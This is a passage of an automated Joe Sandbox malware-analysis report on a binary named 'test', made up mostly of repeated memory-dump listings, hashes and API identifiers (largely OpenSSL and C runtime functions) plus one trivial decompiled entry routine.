                                                                                                                                                                • Instruction ID: 3bfb88c5979ec1666a3f0783bc7d2ac897cf31a6502ec2b58e5a217044956d6f
                                                                                                                                                                • Opcode Fuzzy Hash: e1c81a765875b987af6ce7381e9c39fea55679f384358aa352923a1f1ce32b8d
                                                                                                                                                                • Instruction Fuzzy Hash: 232190B6B0814AD6E725DB20E8656ED7360FF80304F840231E76C43A95DF3DE589EB40
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastioctlsocket
                                                                                                                                                                • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                • API String ID: 1021210092-540685895
                                                                                                                                                                • Opcode ID: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
                                                                                                                                                                • Instruction ID: 581d40725691655526b4c6309f48319c5746a3baf1354b6beb656b4e82ebd8fc
                                                                                                                                                                • Opcode Fuzzy Hash: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
                                                                                                                                                                • Instruction Fuzzy Hash: 92E0D895B0954B87F71A5B60E874B7D1310AF84304F000134EF1DC2691DF3DF149A601
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B2CB
                                                                                                                                                                • memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B313
                                                                                                                                                                • memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B32D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3297308162-0
                                                                                                                                                                • Opcode ID: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
                                                                                                                                                                • Instruction ID: 5dcb10c62d986749a5643e8c892569aefbdb855d31880017d62f8cbbf9d2875b
                                                                                                                                                                • Opcode Fuzzy Hash: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
                                                                                                                                                                • Instruction Fuzzy Hash: FB910861B0868982EB189B17D4A017DA7A0FBC9FC4F588035DF8D93B96CE3EE855D700
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2162964266-0
                                                                                                                                                                • Opcode ID: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
                                                                                                                                                                • Instruction ID: 7806a3e2b7fff18afe6bea40b5bd3edb473fd01d1bbea04dea83d53fcd418057
                                                                                                                                                                • Opcode Fuzzy Hash: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
                                                                                                                                                                • Instruction Fuzzy Hash: 4A11BF62B04A8592D714EB1AE1901EDA360FF847D0F448132FB9E87B96EF28E5E1D300
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			_entry_() {
                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                				intOrPtr* _t6;
                                                                                                                                                                				void* _t9;
                                                                                                                                                                
                                                                                                                                                                				_v12 = 0xff;
                                                                                                                                                                				_t6 =  *0x5db620; // 0x5f6ea0
                                                                                                                                                                				 *_t6 = 1; // executed
                                                                                                                                                                				_v12 = L0040114B(_t9);
                                                                                                                                                                				return _v12;
                                                                                                                                                                			}






                                                                                                                                                                0x004010f5
                                                                                                                                                                0x004010fc
                                                                                                                                                                0x00401103
                                                                                                                                                                0x0040110e
                                                                                                                                                                0x0040111b

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.219096560.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.219089830.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.219148606.00000000005C2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.219157156.00000000005D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.219165085.00000000005DF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.219173616.00000000005EC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.219173616.00000000005F8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.219188210.00000000005FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_test.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0627318d90cec2deb4beba49524667c5b684d189ba6ba86565943c584361f479
                                                                                                                                                                • Instruction ID: ef569db1cc39ee6c2fbb2dfec9dda639ce9a648156eaba70ce610853e08ca3f6
                                                                                                                                                                • Opcode Fuzzy Hash: 0627318d90cec2deb4beba49524667c5b684d189ba6ba86565943c584361f479
                                                                                                                                                                • Instruction Fuzzy Hash: 1DC02238200A08CEF300BF22CC023A833B0A308F08F80002ACE080F3A2CBBCC0028F08
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide_errno$FileFind$ErrorFirstLastNextfreemallocmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3372420414-0
                                                                                                                                                                • Opcode ID: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
                                                                                                                                                                • Instruction ID: dc931f34dada93bae943df16885b375699c41fa0d4b9d81008c95cc65b2e24da
                                                                                                                                                                • Opcode Fuzzy Hash: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
                                                                                                                                                                • Instruction Fuzzy Hash: FBB11562B08A8685EB188F25E8686797BA0FF59BA4F484731DB6D037D0EF3DE0459340
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentVariable$ByteCharMultiWide
                                                                                                                                                                • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                                                                                                                                • API String ID: 2184640988-1666712896
                                                                                                                                                                • Opcode ID: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
                                                                                                                                                                • Instruction ID: f3b2b23f387a46e4829f6c578e815338dd02b7ff32691be0f381d938ecf791b3
                                                                                                                                                                • Opcode Fuzzy Hash: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
                                                                                                                                                                • Instruction Fuzzy Hash: F761E322B08B8695EB58CF21A46017967A1FB59BE4B488331DF6D437D8DF3EE105E300
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                • Opcode ID: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
                                                                                                                                                                • Instruction ID: 65425b828e2fc1675746f37939820d40e660f106bd68d24aa44ab5b4e75d7187
                                                                                                                                                                • Opcode Fuzzy Hash: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
                                                                                                                                                                • Instruction Fuzzy Hash: B0315CB6709B859AEB649F60E8503ED3360FB84788F44413ADB8E57B98EF38D548D710
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmove$memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3790616698-0
                                                                                                                                                                • Opcode ID: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
                                                                                                                                                                • Instruction ID: ef228217251fa738fd2fdc68da1d979ef389dc1a69dbe499d5f87608ff27f064
                                                                                                                                                                • Opcode Fuzzy Hash: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
                                                                                                                                                                • Instruction Fuzzy Hash: CE51E022B1D78986DA109B16F85026EBBA0FB89BD4F484135EF9D07B95CE3CE501D740
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
